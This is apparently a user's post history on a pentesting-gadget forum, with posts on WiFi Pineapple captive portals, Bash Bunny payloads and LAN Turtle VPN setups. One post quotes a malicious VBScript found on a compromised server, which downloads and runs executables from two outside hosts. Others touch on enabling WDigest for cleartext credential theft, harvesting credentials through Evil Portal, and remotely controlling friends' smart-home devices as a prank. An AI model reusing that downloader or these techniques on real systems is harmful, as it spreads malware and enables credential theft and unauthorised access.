jermzz
-
Posts
102 -
Joined
-
Last visited
Posts posted by jermzz
-
-
If you're connecting by serial then you're in arming mode which doesn't support Ethernet. Use one of the switches and set to Ethernet attack vector. Then you may run the bb.sh and ssh into your bunny. Took me a few min to figure this out as well.
-
1
-
-
Looks like they are updated via repository?
-
3 minutes ago, one2 said:
Yeah I guess I should have specified that I would like to primarily add the registry modification into the stealth payload (pulling up the registry and modifying the WDigest "UseLogonCredential" to 1) on the first run, rather than either loading up PowerMemory or modifying the registry manually (allotted time would be minimal). Then wait for the target machine to be rebooted before inserting the RD once more to grab the plain text.
So you need two payloads :)
-
it's not going to work if it needs to run before and after a reboot issuing different key strokes. Especially if it needs to enter an unknown login password
-
Cd metaspoit-framework directory.
Gem install activesupport
or
gem install bundler
bundle install
-
3 hours ago, sud0nick said:
Fun fact, I thought the exact same way a couple years ago and built PortalAuth to automatically authenticate the Pineapple with captive portals (hence the name). newbi3 pretty much told me the same thing I told you and over time the module evolved into a cloner more than something that just bypasses captive portals.
Makes perfect sense. It's funny I was going through loops to do something so easy has I just thought about it logically. Guess I don't think out of the box well ? Thanks again nick.
-
1 hour ago, sud0nick said:
You definitely didn't even try what I said...
You're right. I misunderstood. I thought you were telling me to tether to my laptop. That should work, didn't even clue into that. Thanks :)
-
2 hours ago, sud0nick said:
Connect the Pineapple to the AP, connect your laptop to the Pineapple, open a browser, click and get interwebz.
I want to control the pineapple by wifi either than tether from my laptop. Only way I've found so far That works is to use macchanger to clone the mac of my wireless wlan2 with my kali box and then Disconnect / connect the pineapple
-
You don't need the LAN turtle. Just plug the cord into your computer, then plug your pineapple into the USB port. Share internet to the pineapple, and then you should be able to connect to the management interface via wifi from your other devices.
I would strongly suggest disabling your open interface, making a strong password for your management interface and changing your pineapple IP address if you're going to do this... for security reasons.
-
I have the field kit. It's great. Although it looks like it was made for the MKV. it still works for my nano, but I'd love to see a kit, it would probably have to be marginally larger, that would fit the tetra somehow. The tactical bag isn't really realistic for me when carrying all my other things, and I've been just carrying my tetra in its box in my bag. It works for now, but this is something I'd love to see. A field kit case that carries all the current goodies plus a tetra.
-
Anyone know a good method to authenticate the pineapple with a portal that makes you click to accept and get internet? Usually I would put my laptop on the wifi and then share internet to the pineapple, but I would like to use client mode and have the pineapple sit by itself and manage it via the management interface.
thanks.
-
Thanks man, this helped me. I couldn't get my terea working for an hour. Ended up starting it like you said, and repeatedly pounding the reset button hard like 50 times, and then the continue button finally worked.
Honestly makes me wonder about quality control. I was really distraught that I was about to have to RMA my Tetra. I knew I was doing the process right, as I have a nano which wotks flawlessly now. I say now because my first one was defective, had to get replaced.
Additionally, I just read that that some of the pineapple 1500's have the shut off problem..... I got my field kit and didn't use my 1500 for quite a while because I didn't need it really, and because I have a couple other Ankers that work well. Then, when i went to use it 4 (est) months later, it would just turn off when I tried to plug something in. I shrugged it off because who knows what I may have done unknowingly, and the fact that I had more usb chargers made it negligible.
I've sent hak5 in total probably $1500 of my hard earned money in total, and it seems that most of my featured products have had major flaws that inhibit it's basic functionality. Replaced nano, broken pineapple juice, abusive handling for my tetra to work properly.....
Hopefully at the least hak5 will replace my pineapple juice 1500. I really do like my products when I get them in working order. I'll reach out to them next week.
Jeremy
-
The VM has indeed been recreated. I'll have to ask her what VM she uses.
I found this, seems to be what she may have had
http://m.theinquirer.net/inquirer/news/2109599/worlds-dangerous-botnet-mines-bitcoins
edit: so she was running an old version of Wordpress and MySQL. She was asking for it. Now she knows.
-
It all started yesterday when she realized her VM, which is a Windows server 2012 r2 machine her friend hosts for her (hyper-v), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of cpu. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why?
So looking deeper, a script was found in c:\ a vbs script (insert garbage here).vbs here's what was in it.
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.game918.me:2545/host.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
afile = "host.exe"
aGet.SaveToFile afile,2
Shell.Run (afile)
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://huya1219.top/svchost.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
afile = "svchost.exe"
aGet.SaveToFile afile,2
Shell.Run (afile)
It appears it was downloading executables that were scripts and then copying them to run? Not aire what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bit coin mining service. This little bastard spidered everywhere.
My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) dll files in the MySQL server plugins folder. Im assuming it was some MySQL vulnerablity for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another. No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight.
http://imageshack.com/a/img924/108/gsFTxn.jpg
-
If you use open VPN, you should be able to put a remote computer on the network with bettercap / whatever you want to do. That's what I do anyway. The target network will just obviously need Internet access.
-
I've had issues cracking wep using an ap that has just been created for cracking purposes. Same issues. But when I've tried on all real networks with tablets and phones and computers attached, it's only been a short time before ACK requests stated capturing IVs. Try on a real network.
-
Hello. I have my turtle setup on my network using open VPN to tunnel to my vps. Everything works, but I wish the turtle to assign ips to my home subnet that the turtle resides on instead of its own subnet.
Ie turtle subnet is 172.42.x.x and my home network which the turtle is plugged into subnet is 10.0.x.x (comcast)
When I connect remotely, my devices are assigned ip 172.42.x.x and I wish them to be 10.0.x.x
How can I accomplish this? Almost like I need it to be an access point. I have this in another section but I think it's a better fit question here.
Thanks.
-
I see yes you're right I'm getting a 172.x.x.x address of the turtle on that interface when I run ifconfig on my phone.
Is there a way I can make the turtle assign to my 10.0.0.1/24 network my home runs on?
I could set up my own VPN at home. But I was looking for a drop and go solution such as the turtle. Can't set a VPN up at my buddy's place.
-
I know, first response is "yes dummy," but I want to do something kind of specific. My home and most of my friend's are all turning into smart homes. We have an echo controlling our TV and wemo lights and plugs, using harmony and fire TV, etc. All using apps from our phones. I wanted to try and play a little trick on my friends and girlfriend by remotely controlling the home devices remotely when they're using them.
I have my turtle currently connected to my home network running open VPN to my digital ocean vps. I can connect to my network remotely with other devices. I can ping devices on my network, Nmap, etc, but I can't use any of the apps designed to work with them directly. Ie: alexa, firetv. I'm assuming this is because the apps look for Internet via (in case of my galaxy s7) wlan0 instead of the tun0 interface my turtle creates with the VPN.
When that didn't work because I was not on wifi, I tried to connect my phone to the VPN and then Hotspot it to another device so I'd be on wifi which also failed because of how the VPN works.
Does anyone have any idea how I could get something like this to work? Or is it not possible? Devices I have to work with: turtle, nano, kali live USB and nethunter tablet.
Tia for any input
Jermzz
-
you can use fingerprint on secondary roms with multirom, I ended up messing with multirom for a bit just flashed CM13 for my primary rom and its great, everything works but I havent tryed google pay. Also the systemless root on the nexus 6p is awesome, I was hesitating for a long time about it but very happy I did.
I had an att moto x 2013 that it worked fine on but I had root for tethering, I never tryed it non-rooted. My stock Nexus6p wouldnt usb or wifi tether with stock rom due to TOS conditions of Att or in my case Straight talk. After root everything worked just fine. Marshmallows everywhere
Interesting. I think you have to pay for tether with att. My plan has hotspot, but I can't use it with my nano because it's an iPhone. Hopefully no problem with the s7, although I'm sure there will be a root method shortly.
-
Anyone using marshmallow on an att phone? I just ordered an s7 edge. I thought I remembered some problem with marshmallow. Haven't been here in 4 or 5 weeks.
-
Seems kinda pointless if you have to physically access the computer you're trying to compromise. If I could do that, there's other ways to get this done. This is supposed to be a remote network sniff scenario.
-
Salatrip+ was incorporated into MITMf a while ago, along with a dns server. When I tried using it to mitm my home network, hsts still prevailed. No logins, https at the top of all the pages.
Can someone explain how bettercap is different?
-
Since I can't get css files to load, I just use css style tags in splash.html and that works. But if you put your images in /etc/nodogsplash/htdocs/images you should be able to reference them by just using images/image.png. I get background images to load that way. Don't put them in /www if that's how you're trying. Anyway all moot since it will all be changed soon. You can use this temporarily though.
-
1
-
[Evil Portal] - IOS internet check issue
in WiFi Pineapple
Posted · Edited by jermzz
I have the same problem with IOS, and unfortunately I can't find a fix.
I set the portal up to just reload the signup page on submit, so I could try submitting multiple times to see what happens.
On the first attempt, nothing happens. The login page just reloads. The second attempt, the authorization goes though, and I get the credentials logged. If I hit the submit button a THIRD time, Apple will see the internet, access the captive.apple.com/hotspot-detect.html page and it will display "Success" and then the cancel button turns to a Done.
Not sure what causes it since the internet works the whole time. Maybe the iptables rule is taking time.
Also, for android everything works fine. At least with the phone I have. It's a Galaxy S 9 that's trapped on Android 10. First attempt it captures credentials and closes the portal and grants internet access. So it definitely seems to be an iOS issue.